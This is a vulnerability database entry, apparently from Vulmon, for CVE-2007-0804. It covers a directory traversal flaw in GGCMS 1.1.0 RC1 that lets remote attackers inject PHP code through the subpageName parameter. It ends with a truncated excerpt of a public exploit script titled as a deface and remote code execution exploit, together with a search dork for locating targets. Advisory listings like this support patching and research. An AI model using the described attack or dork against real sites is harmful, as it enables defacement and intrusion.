7.5
CVSSv2

CVE-2007-0804

Published: 07/02/2007 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Directory traversal vulnerability in admin/subpages.php in GGCMS 1.1.0 RC1 and previous versions allows remote malicious users to inject arbitrary PHP code into arbitrary files via ".." sequences in the subpageName parameter, as demonstrated by injecting PHP code into a template file.

Vulnerable Product Search on Vulmon Subscribe to Product

ggcms ggcms 1.1.0_rc1

Exploits

<? //************************************************************** //Kacper & str0ke Settings $exploit_name = "GGCMS <= v110 RC1 Remote Auto Deface Exploit / Remote Code Execution Exploit"; $script_name = "GGCMS v110 RC1"; $script_site = "ggcmsweblancepl/"; $dork = '"Powered by GGCMS"'; //*********************************** ...